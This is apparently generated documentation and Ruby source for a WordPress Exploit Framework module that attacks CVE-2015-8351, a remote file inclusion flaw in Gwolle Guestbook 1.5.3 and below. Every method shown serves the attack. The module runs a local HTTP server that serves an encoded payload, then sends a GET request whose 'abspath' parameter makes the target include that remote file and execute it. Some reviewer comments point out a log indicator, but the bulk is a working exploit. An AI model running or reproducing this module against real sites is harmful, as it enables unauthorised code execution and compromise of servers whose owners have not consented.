class Wpxf::Exploit::GwolleGuestbookRemoteFileInclusion

Public Class Methods

new()
Calls superclass method Wpxf::Net::HttpServer::new
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 7
# Sets up the module: records its metadata via update_info and declares the
# two options that locate the file served for the inclusion request.
#
# The description states the affected range (Gwolle Guestbook 1.5.3 and
# below) and the precondition: PHP "allow_url_include" must be enabled, and
# it is disabled by default. References are CVE-2015-8351 and EDB 38861.
def initialize
  super

  description = 'The Gwolle Guestbook plugin, in versions 1.5.3 and below, '\
                'allows for remote file inclusion and remote code execution. '\
                'This exploit only works when the PHP option "allow_url_include" '\
                'is enabled (disabled by default).'
  credits = [
    'High-Tech Bridge Security Research Lab', # Vulnerability disclosure
    'rastating'                               # WPXF module
  ]

  update_info(
    name: 'Gwolle Guestbook Remote File Inclusion',
    desc: description,
    author: credits,
    references: [%w[CVE 2015-8351], %w[EDB 38861]],
    date: 'Nov 04 2015'
  )

  # Required, no default: the operator must state which address is used in
  # the URL handed to the plugin.
  host_option = StringOption.new(
    name: 'rfi_host',
    desc: 'The address of the host listening for a connection',
    required: true
  )

  # Defaults to eight random alphabetic characters, generated once when the
  # module is instantiated.
  path_option = StringOption.new(
    name: 'rfi_path',
    desc: 'The path to access via the remote file inclusion request',
    default: Utility::Text.rand_alpha(8),
    required: true
  )

  register_options([host_option, path_option])
end

Public Instance Methods

check()
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 46
# Version check for the Gwolle Guestbook plugin.
#
# Hands the plugin slug and the version string '1.5.4' to
# check_plugin_version_from_readme and returns whatever that helper returns.
# NOTE(review): '1.5.4' is presumably the first fixed release, since the
# module description lists 1.5.3 and below as affected -- confirm against
# the helper's comparison semantics.
def check
  plugin_slug = 'gwolle-gb'
  version_bound = '1.5.4'
  check_plugin_version_from_readme(plugin_slug, version_bound)
end
on_http_request(path, params, headers)
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 62
# HTTP request callback (presumably invoked by the HttpServer mixin for each
# incoming request -- confirm against Wpxf::Net::HttpServer).
#
# All three arguments are ignored: the same encoded payload is returned
# whatever path, parameters or headers the request carried, so the rfi_path
# option is not enforced here.
#
# @param path [Object] unused
# @param params [Object] unused
# @param headers [Object] unused
# @return the value of payload.encoded
def on_http_request(path, params, headers)
  response_body = payload.encoded
  response_body
end
plugin_url()
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 42
# Base URL of the plugin on the target site.
#
# @return the result of joining wordpress_url_plugins with the plugin
#   directory name 'gwolle-gb' through normalize_uri
def plugin_url
  plugins_root = wordpress_url_plugins
  normalize_uri(plugins_root, 'gwolle-gb')
end
rfi_host()
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 50
# Reader for the 'rfi_host' option.
#
# @return the value normalized_option_value yields for 'rfi_host'
def rfi_host
  option_name = 'rfi_host'
  normalized_option_value(option_name)
end
rfi_path()
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 54
# Reader for the 'rfi_path' option.
#
# @return the value normalized_option_value yields for 'rfi_path'
def rfi_path
  option_name = 'rfi_path'
  normalized_option_value(option_name)
end
rfi_url()
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 58
# URL that run sends as the 'abspath' request parameter.
#
# Built from the rfi_host option, the bind port of the module's HTTP server
# and the rfi_path option. The scheme is always plain http.
#
# @return [String] "http://<rfi_host>:<http_server_bind_port>/<rfi_path>"
def rfi_url
  host = rfi_host
  port = http_server_bind_port
  path = rfi_path
  "http://#{host}:#{port}/#{path}"
end
run()
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 70
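# Runs the module: starts the local HTTP server, sends one GET request to
# vulnerable_url with the 'abspath' parameter set to rfi_url, stops the
# server, and reports the response.
#
# On the wire this is a GET to the plugin's ajaxresponse.php whose 'abspath'
# parameter holds an http:// URL. That is the request shape to look for in
# web-server access logs.
#
# @return [Boolean] false when the superclass run fails, when no response is
#   received, or when the response body mentions allow_url_include;
#   true otherwise
def run
  return false unless super

  # NOTE(review): the `true` argument presumably starts the server without
  # blocking -- confirm against Wpxf::Net::HttpServer.
  start_http_server(true)

  begin
    emit_info 'Executing request...'
    res = execute_get_request(
      url: vulnerable_url,
      params: { 'abspath' => rfi_url }
    )
  ensure
    # Always shut the listener down, even if the request raises, so that no
    # server is left bound after the module finishes.
    stop_http_server
  end

  # The response used to be dereferenced (res.code, res.body) before the
  # nil guard, so a missing response raised NoMethodError instead of
  # failing cleanly.
  if res.nil?
    emit_error 'No response received from the target'
    return false
  end

  body = res.body.to_s
  emit_info "Response code: #{res.code}", true
  emit_info "Response body: #{body}", true

  # The module treats this string in the body as a sign that the PHP option
  # is off (presumably PHP's own include warning leaking into the response).
  if body.include?('allow_url_include')
    emit_error 'allow_url_include appears to be disabled'
    return false
  end

  emit_success "Result: #{body}" unless body.strip.empty?

  true
end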
vulnerable_url()
# File lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb, line 66
# URL of the plugin script that run sends its request to.
#
# @return the result of joining plugin_url with 'frontend', 'captcha' and
#   'ajaxresponse.php' through normalize_uri
def vulnerable_url
  script_segments = %w[frontend captcha ajaxresponse.php]
  normalize_uri(plugin_url, *script_segments)
end